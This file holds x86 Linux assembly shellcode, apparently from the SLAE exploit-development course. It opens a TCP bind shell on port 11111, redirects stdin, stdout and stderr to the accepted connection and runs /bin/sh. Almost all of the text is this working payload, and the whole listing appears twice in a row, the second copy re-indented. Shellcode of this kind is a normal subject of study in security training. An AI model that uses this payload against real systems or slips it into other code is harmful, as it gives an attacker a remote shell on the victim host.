geyslan/shell_bind_tcp_shellcode.asm

## shell_bind_tcp_shellcode.asm
; This is a snippet of the original file in https://github.com/geyslan/SLAE/blob/master/1st.assignment/shell_bind_tcp_shellcode.asm

global _start

section .text

_start:

	; Setting port number

	mov bp, 0x672b		; port in byte reverse order = 11111


	; Creating the socket file descriptor
	; socket(2, 1, 0)

	push 102
	pop eax
	cdq

	push 1
	pop ebx

	; socket arguments
	push edx
	push ebx
	push 2

finalint:

	mov ecx, esp
	int 0x80

	mov esi, eax		; esi now contains the socket file descriptor

        pop edi                 ; pop 2 to edi


	; Avoiding SIGSEGV when trying to reconnect before the kernel to close the socket previously opened
        ; This problem happens in most shellcodes, even in the Metasploit, because they do not care
        ; about the reuse of the socket address
	; setsockopt(sockfd, 1, 2, &socklen_t, 4)

	mov al, 102

	; setsockopt arguments
	push 4
	push esp
	push edi
	push ebx
	push esi

	mov ecx, esp

	mov bl, 14
	int 0x80


	; Biding the socket with an address type
	; bind(sockfd, [2, port, 0], 16)

	mov al, 102
	mov ebx, edi

	; sockaddr_in struct
	push edx
	push bp			; port number
	push bx

	mov ecx, esp

	; bind arguments
	push 16
	push ecx
	push esi

	mov ecx, esp

	int 0x80


	; Preparing to listen the incoming connection (passive socket)
	; listen(sockfd, 0)

	mov al, 102
	mov bl, 4

	push edx
	push esi

	mov ecx, esp

	int 0x80


	; Accepting the incoming connection
	; accept(sockfd, 0, 0)

	mov al, 102
	inc ebx

	mov [esp+8], edx

	int 0x80

	xchg eax, ebx


	; Creating a interchangeably copy of the 3 file descriptors (stdin, stdout, stderr)
	;dup2 (clientfd, fd)

	mov ecx, edi

dup_loop:
        mov al, 63
        int 0x80

        dec ecx
        jns dup_loop		; looping (2, 1, 0)


	; Finally, using execve to substitute the actual process with /bin/sh
        ; execve("/bin/sh", ["/bin/sh", 0], 0)
        mov al, 11

        push edx
        push 0x68732f2f         ; "//sh"
        push 0x6e69622f         ; "/bin"

        mov ebx, esp
        push edx
        push ebx

	jmp finalint
	; This is a snippet of the original file in https://github.com/geyslan/SLAE/blob/master/1st.assignment/shell_bind_tcp_shellcode.asm

	global _start

	section .text

	_start:

	; Setting port number

	mov bp, 0x672b ; port in byte reverse order = 11111


	; Creating the socket file descriptor
	; socket(2, 1, 0)

	push 102
	pop eax
	cdq

	push 1
	pop ebx

	; socket arguments
	push edx
	push ebx
	push 2

	finalint:

	mov ecx, esp
	int 0x80

	mov esi, eax ; esi now contains the socket file descriptor

	pop edi ; pop 2 to edi


	; Avoiding SIGSEGV when trying to reconnect before the kernel to close the socket previously opened
	; This problem happens in most shellcodes, even in the Metasploit, because they do not care
	; about the reuse of the socket address
	; setsockopt(sockfd, 1, 2, &socklen_t, 4)

	mov al, 102

	; setsockopt arguments
	push 4
	push esp
	push edi
	push ebx
	push esi

	mov ecx, esp

	mov bl, 14
	int 0x80


	; Biding the socket with an address type
	; bind(sockfd, [2, port, 0], 16)

	mov al, 102
	mov ebx, edi

	; sockaddr_in struct
	push edx
	push bp ; port number
	push bx

	mov ecx, esp

	; bind arguments
	push 16
	push ecx
	push esi

	mov ecx, esp

	int 0x80


	; Preparing to listen the incoming connection (passive socket)
	; listen(sockfd, 0)

	mov al, 102
	mov bl, 4

	push edx
	push esi

	mov ecx, esp

	int 0x80


	; Accepting the incoming connection
	; accept(sockfd, 0, 0)

	mov al, 102
	inc ebx

	mov [esp+8], edx

	int 0x80

	xchg eax, ebx


	; Creating a interchangeably copy of the 3 file descriptors (stdin, stdout, stderr)
	;dup2 (clientfd, fd)

	mov ecx, edi

	dup_loop:
	mov al, 63
	int 0x80

	dec ecx
	jns dup_loop ; looping (2, 1, 0)


	; Finally, using execve to substitute the actual process with /bin/sh
	; execve("/bin/sh", ["/bin/sh", 0], 0)
	mov al, 11

	push edx
	push 0x68732f2f ; "//sh"
	push 0x6e69622f ; "/bin"

	mov ebx, esp
	push edx
	push ebx

	jmp finalint